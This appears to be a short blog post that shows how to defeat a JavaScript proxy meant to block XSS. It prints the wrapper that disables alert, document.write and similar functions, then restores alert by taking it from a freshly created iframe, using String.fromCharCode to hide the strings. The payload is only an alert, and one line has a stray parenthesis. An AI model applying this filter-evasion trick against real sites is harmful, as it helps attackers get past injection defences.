xss in sandboxed javascript

XSS in sandboxed javascript.

bypassing JS proxy

// Proxing the Alert and more.. (eval, etc)

(function () {
    /*  
    XSS prevention via JavaScript 
    */
    var XSSObject = new Object();
    XSSObject.lockdown = function (obj, name) {
        if (!String.prototype.startsWith) {
            try { 
                if (Object.defineProperty) {
                    Object.defineProperty(obj, name, {
                        configurable: false
                    });
                }
            } catch (e) { };
        }
    }
    XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
        var proxy = obj[name];
        obj[name] = function () {
            if (exec_original) {
                return proxy.apply(this, arguments);
            }
        };
        XSSObject.lockdown(obj, name);
    };
    XSSObject.proxy(window, 'alert', 'window.alert', false);
    XSSObject.proxy(window, 'confirm', 'window.confirm', false);
    XSSObject.proxy(window, 'prompt', 'window.prompt', false);
    XSSObject.proxy(window, 'unescape', 'unescape', false);
    XSSObject.proxy(document, 'write', 'document.write', false);
    XSSObject.proxy(String, 'fromCharCode', 'String.fromCharCode', true);
})();

// alert, nothing happend.
alert(1);

// Clean window iframe
const frame = document.createElement(String.fromCharCode(105,102,114,97,109,101));
document.body.appendChild(frame));

// Get back alert
alert = frame.contentWindow.alert.bind(window);

// Test

alert(String.fromCharCode(88,83,83))

0 pensamientos:

Post a Comment

feedback!